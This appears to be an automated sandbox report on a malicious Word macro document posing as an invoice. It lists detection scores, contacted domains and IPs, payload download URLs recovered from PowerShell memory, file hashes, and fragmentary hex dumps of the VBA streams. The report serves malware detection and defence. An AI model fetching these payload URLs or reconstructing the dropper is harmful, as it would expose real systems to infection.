Valid Accounts	11 Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	4 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	11 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Scripting	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	3 Exploitation for Client Execution	Logon Script (Mac)	Logon Script (Mac)	1 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Scripting	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
INV_PO_12172019EX.doc	30%	ReversingLabs	Script-Macro.Trojan.Heuristic
INV_PO_12172019EX.doc	70%	Virustotal		Browse
INV_PO_12172019EX.doc	100%	Avira	W97M/Agent.5776312
INV_PO_12172019EX.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\~DF413F6883B338D566.TMP	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
7arasport.com	2%	Virustotal	Browse
dev2.ektonendon.gr	8%	Virustotal	Browse
amstaffrecords.com	9%	Virustotal	Browse
ww38.7arasport.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://foozoop.com/wp-content/Qxi7iVD/	0%	Avira URL Cloud	safe
http://7arasport.com/validatefield/gj/	0%	Avira URL Cloud	safe
https://diagnostica-products.com/wp-admin/hio2u7w/PE	100%	Avira URL Cloud	malware
http://ww38.7arasport.com	0%	Avira URL Cloud	safe
https://diagnostica-products.com/wp-admin/hio2u7w/	100%	Avira URL Cloud	malware
http://foozoop.com/wp	0%	Avira URL Cloud	safe
http://amstaffrecords.com/individualApi/0/	100%	Avira URL Cloud	malware
http://amstaffrecords.com/indivi	100%	Avira URL Cloud	phishing
http://7arasport.com	0%	Avira URL Cloud	safe
http://foozoop.com	0%	Avira URL Cloud	safe
https://diagnostica-products.com	0%	Avira URL Cloud	safe
http://ww38.7arasport.com/validatefield/gj/	0%	Avira URL Cloud	safe
http://amstaffrecords.com	100%	Avira URL Cloud	phishing
http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/	100%	Avira URL Cloud	malware
http://dev2.ektonendon.gr	100%	Avira URL Cloud	phishing
http://ja.com/he	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
701602.parkingcrew.net	13.248.148.254	true	false		high
7arasport.com	103.224.212.222	true	true	2%, Virustotal, Browse	unknown
dev2.ektonendon.gr	162.212.129.161	true	true	8%, Virustotal, Browse	unknown
amstaffrecords.com	unknown	unknown	true	9%, Virustotal, Browse	unknown
ww38.7arasport.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
diagnostica-products.com	unknown	unknown	true		unknown
foozoop.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://7arasport.com/validatefield/gj/	true	Avira URL Cloud: safe	unknown
http://ww38.7arasport.com/validatefield/gj/	false	Avira URL Cloud: safe	unknown
http://dev2.ektonendon.gr/cgi-bin/mTTCFmVe/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://foozoop.com/wp-content/Qxi7iVD/	powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929114441.000000000024F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://diagnostica-products.com/wp-admin/hio2u7w/PE	powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://foozoop.com/wp	powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://amstaffrecords.com/individualApi/0/	powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.941139445.000000001B40F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ww38.7arasport.com	powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://amstaffrecords.com/indivi	powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ja.com/he	powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://diagnostica-products.com	powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://diagnostica-products.com/wp-admin/hio2u7w/	powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000005.00000002.929114441.000000000027E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929114441.000000000024F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://foozoop.com	powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://7arasport.com	powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://amstaffrecords.com	powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.929695204.000000000368E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://dev2.ektonendon.gr	powershell.exe, 00000005.00000002.929695204.00000000037C6000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.148.254	701602.parkingcrew.net	United States	16509	AMAZON-02US	false
103.224.212.222	7arasport.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
162.212.129.161	dev2.ektonendon.gr	United States	55293	A2HOSTINGUS	true

Private

IP
192.168.2.255

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	800690
Start date and time:	2023-02-07 18:13:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 50s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	INV_PO_12172019EX.doc
Detection:	MAL
Classification:	mal100.troj.evad.winDOC@2/19@6/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, wisptis.exe, conhost.exe
Execution Graph export aborted for target powershell.exe, PID 2412 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:13:25	API Interceptor	46x Sleep call for process: powershell.exe modified

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Windows metafile
Category:	dropped
Size (bytes):	444
Entropy (8bit):	3.2627072103345656
Encrypted:	false
SSDEEP:	12:Mh86p058QYNAPzSxsfb0R4EXSvCzSN+uztl:O905TZzSWfbUYvn7xl
MD5:	11D3F9A2B8772B00E439701105F9E8EF
SHA1:	19F7EDC5F445A9A54827570476F06835BAF9EBB8
SHA-256:	60A14153FAC78B3EE62D0E5418F76DD4AA3A723EBC52622D7DF5A12FC3A44A60
SHA-512:	48F13B0FA31B8FA0EC89047A3F0B42A9DC72114692AEEC276D4F54FF72548F421C8BB3BB3398B7C47BB6AB39E5F835CBDFC34AB50A856C439145C68ECA136EDE
Malicious:	false
Reputation:	low
Preview:	......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.M..1....(l...I.u@..uM.f)....-.................'.........

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.583147657409058
Encrypted:	false
SSDEEP:	96:chQCNAPXMqIqvsqvJCwoSz8hQCNAPXMqIqvsEHyqvJCworkzsKPrY1HFyuyrBKPW:cofRoSz8ofJHnorkzsKud+BKojp
MD5:	292F304870BE5532F0EF707A59FD2F19
SHA1:	FD7EF902B0E44F4E7187B34156CC61D56A25E7F8
SHA-256:	2F7EE2660521FC2D367CE89E05FC58728EC17635DB254A51AF980DA54E9BFE46
SHA-512:	57270A0CACF1929380EDCBF2691D2C521F0A9948ECE43C36090F7D2B08F1A2F102AB812AA31A04776BB59CB446B36CD7D852A4561A398CEBBAC4910AF2582DED
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT.....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Molestiae., Author: Paul Gauthier, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 17 19:30:00 2019, Last Saved Time/Date: Tue Dec 17 19:30:00 2019, Number of Pages: 1, Number of Words: 5, Number of Characters: 34, Security: 0
Entropy (8bit):	6.586615503838857
TrID:	Microsoft Word document (32009/1) 54.23% Microsoft Word document (old ver.) (19008/1) 32.20% Generic OLE2 / Multistream Compound File (8008/1) 13.57%
File name:	INV_PO_12172019EX.doc
File size:	188839
MD5:	3b7fa78ebf399bb0230590bfec589fa7
SHA1:	199d4646fdbf9b5167d80ed71ce0ea406c40b018
SHA256:	5c2dc72128d235ecdca49e4026ec782cdce9021c5b46ebf841000bab5ebcc129
SHA512:	c1936fad69a8231b5e39f8a757d469af2487c3f40944ce9b20094d2924510f6fff341ae7123cc179bd8419a68ed28ba4b0dd4c500b9d6cccd6339d23c8c480af
SSDEEP:	3072:752y/GdynktGDWLS0HZWD5w8K7Nk9uD7IBUOUasgt+PpkkrbfzHQfzZExXMHIwtN:752k43tGiL3HJk9uD7bOUasFPpkkrbfE
TLSH:	CE04AE0435C1BD8BEF9612314BCBEFBA2218BC952D59D25B7249B73D6F304A0D992B21
File Content Preview:	........................>.......................................................N..............................................................................................................................................................................

Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	True
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Title:
Subject:
Author:
Keywords:
Comments:
Template:
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2019-12-17 19:30:00
Last Saved Time:	2019-12-17 19:30:00
Number of Pages:	1
Number of Words:	5
Number of Characters:	34
Creating Application:
Security:	0

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

General
Stream Path:	Macros/VBA/Bnzailenjg
VBA File Name:	Bnzailenjg.bas
Stream Size:	10499
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . Q . Q . . . . . . . . . . ~ . . .
Data Raw:	01 16 01 00 01 f0 00 00 00 ac 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff b3 02 00 00 af 1c 00 00 00 00 00 00 01 00 00 00 39 9e e5 de 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	Macros/VBA/Fbkxcpydi
VBA File Name:	Fbkxcpydi.frm
Stream Size:	1168
Data ASCII:	. . . . . . . . H . . . . . . L . . . O . . . . . . . . . . . . . . 9 Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S P . . . . S . . . . . S . . . . . S . . . . . . . . . . . . 0 . { . 6 . 1 . 6 . 0 . 8 . F . F . 3 . - . A
Data Raw:	01 16 01 00 01 f0 00 00 00 48 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 4f 03 00 00 a3 03 00 00 00 00 00 00 01 00 00 00 39 9e 94 5a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	Macros/VBA/Vidpgeil
VBA File Name:	Vidpgeil.cls
Stream Size:	3353
Data ASCII:	. . . . . % . . . . . . . . . . 7 . . . " . . . < . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . D . . . z . Z F . . x . J . 2 X E ; . < . h . . . . . . . . . . . . . . . . . . . . . + + . O 3 J < . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ! . L x i j u p n g v , 0 , 0 , M S F o r m s , T e x t B o x . + + . O 3 J < . . z . Z F . . x . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S " . . . . S . . . . . S " . . . . s . . . . . 6 " . .
Data Raw:	01 16 01 00 06 25 01 00 00 db 03 00 00 09 01 00 00 37 02 00 00 22 04 00 00 3c 04 00 00 b8 09 00 00 01 00 00 00 01 00 00 00 39 9e da f0 00 00 ff ff e3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 44 00 ff ff 00 00 7a ba d8 fb c3 16 5a 46 b3 f4 04 94 0b c9 78 ec 0f 4a 83 11 32 58 fa 45 92 3b d9 ac 3c 1b 68 18 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	280
Entropy:	2.3907762904521577
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	424
Entropy:	3.311907066926082
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . x . . . . . . . . . . . . . . . . . . d . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 64 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00

General
Stream Path:	1Table
File Type:	ARC archive data, crunched
Stream Size:	7024
Entropy:	5.881578643954767
Base64 Encoded:	True
Data ASCII:	. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
Data Raw:	1a 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

General
Stream Path:	Macros/Fbkxcpydi/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.6106491830605214
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	Macros/Fbkxcpydi/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	293
Entropy:	4.65317603063951
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } F b k x c p y d i . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 3 0 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 5 0 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 46 62 6b 78 63 70 79 64 69 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

General
Stream Path:	Macros/Fbkxcpydi/f
File Type:	data
Stream Size:	682
Entropy:	4.132154186006995
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . H . . . . . . . . T . . . , . ( . . . . . . . Y W M . z . F l . z . J d ? 6 . . . . . 0 . . . . . . . . , . . . . . . . . . . . D . . . . . . . V m m y u t u w y y m x e . . . . . . . . . . . . . ( . . . . . . . . . . . H . . . . . . . M z o n z s z c k d d x . . . . . . . . . . , . . . . . . . . . . . D . . . . . . . L u g n n j b j c s y t q . . . . . . . . . . . . . ( . . . . . . . . . . . @ . . . . . . . C e j f e h s i q d p
Data Raw:	00 04 20 00 08 0c 00 0c 0c 00 00 00 18 00 00 00 00 7d 00 00 6b 1f 00 00 e1 14 00 00 00 00 00 00 00 00 00 00 01 00 00 00 48 00 bb 1f 00 00 02 00 00 00 54 00 00 00 2c 01 28 01 03 00 98 00 9c 00 08 00 f5 59 ca e5 c4 57 d8 4d 9b d6 1d ee ed d2 7a f4 97 b7 b0 e3 2e a7 db 46 a0 d7 6c 9e ba 8e 9b bc 19 7a 12 f2 fb fb ed 4a 84 64 3f 36 d7 8c fe fb 0c 00 00 00 30 02 00 00 00 8c 01 00 00 00

General
Stream Path:	Macros/Fbkxcpydi/o
File Type:	data
Stream Size:	5365
Entropy:	3.5962878587320564
Base64 Encoded:	False
Data ASCII:	. . $ . . . @ . . . . . H , . . . . . . { . . . F g f x n a f l o k y j . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . ( . . . @ . . . . . H , . . . . . . { . . . P a x n v j g g l l g f w . . . . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . $ . . . @ . . . . . H , . . . . . . { . . . O i i c t q z y e n m f . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . . . . @ . . . . . H , . . . . . . { . . . o w e r s h e . . . . . 5 . . . . . . . . . . . . . T a h o m a e . . . . . . @ .
Data Raw:	00 02 24 00 01 01 40 80 00 00 00 00 1b 48 80 2c 0c 00 00 80 ec 09 00 00 7b 02 00 00 46 67 66 78 6e 61 66 6c 6f 6b 79 6a 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 00 02 00 00 54 61 68 6f 6d 61 00 00 00 02 28 00 01 01 40 80 00 00 00 00 1b 48 80 2c 0d 00 00 80 ec 09 00 00 7b 02 00 00 50 61 78 6e 76 6a 67 67 6c 6c 67 66 77 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	616
Entropy:	5.308939685529123
Base64 Encoded:	True
Data ASCII:	I D = " { 3 2 C 0 4 0 1 F - 9 3 B D - 4 2 8 C - 9 E D 1 - C 1 8 5 E 1 7 F A D 7 D } " . . D o c u m e n t = V i d p g e i l / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = F b k x c p y d i . . M o d u l e = B n z a i l e n j g . . E x e N a m e 3 2 = " U f r d r m z p " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G
Data Raw:	49 44 3d 22 7b 33 32 43 30 34 30 31 46 2d 39 33 42 44 2d 34 32 38 43 2d 39 45 44 31 2d 43 31 38 35 45 31 37 46 41 44 37 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 69 64 70 67 65 69 6c 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42 61 73 65 43

General
Stream Path:	Macros/PROJECTlk
File Type:	Windows Precompiled iNF, version 0.1, InfStyle 1, flags 0x59f50000, at 0xf47a
Stream Size:	30
Entropy:	3.40623892865339
Base64 Encoded:	False
Data ASCII:	. . . . . . Y W M . z . . . . . . . .
Data Raw:	01 00 01 00 00 00 f5 59 ca e5 c4 57 d8 4d 9b d6 1d ee ed d2 7a f4 00 00 00 00 00 00 00 00

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	10638
Entropy:	5.338094292911443
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
